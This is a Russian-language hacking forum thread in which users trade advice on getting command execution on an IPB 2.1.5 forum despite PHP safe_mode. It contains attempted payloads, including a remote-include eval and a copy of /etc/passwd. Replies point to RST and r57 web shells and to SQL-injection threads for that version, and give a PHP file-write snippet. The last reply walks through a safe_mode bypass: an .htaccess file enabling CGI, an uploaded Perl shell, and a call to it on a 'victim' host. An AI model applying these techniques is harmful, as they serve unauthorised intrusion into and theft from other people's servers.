Прошу совета - есть в наличии 2.1.5 IPB форум. Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE. Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <====== в созданном посте. Пробовал: eval (include(http://lalalal));//' Пробовал eval(file_get_contents());//' Пробовал copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt"); Пробовал обходить фильтрацию при помощи но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы. Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете? У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5 Заранее, благодарю.
В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.
если на файле +w то иногда может прокатить PHP: <? $file = ''; $cont = ''; $handle = fopen($filename, 'w'); fwrite($handle, $comecontent); fclose($handle); ?> $file – имя файла $cont – то, что пишем в файл https://forum.antichat.ru/thread17281-2.1.5+sql.html https://forum.antichat.ru/thread18495-2.1.5+sql.html
У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.
Попробуй следующим образом. Находим директорию в которую можно писать и доступную по ввв. Создаем там файл .htaccess со строчкой Options +ExecCGI внутри. Заливаем шелл туда же какойнить перловый шелл. Далее делаем ему chmod +x shell.cgi Потом пытаемся вызвать его из броузера. hxxt://victim.com/blablabla/shell.cgi У меня получалось обойти safe_mode таким способом.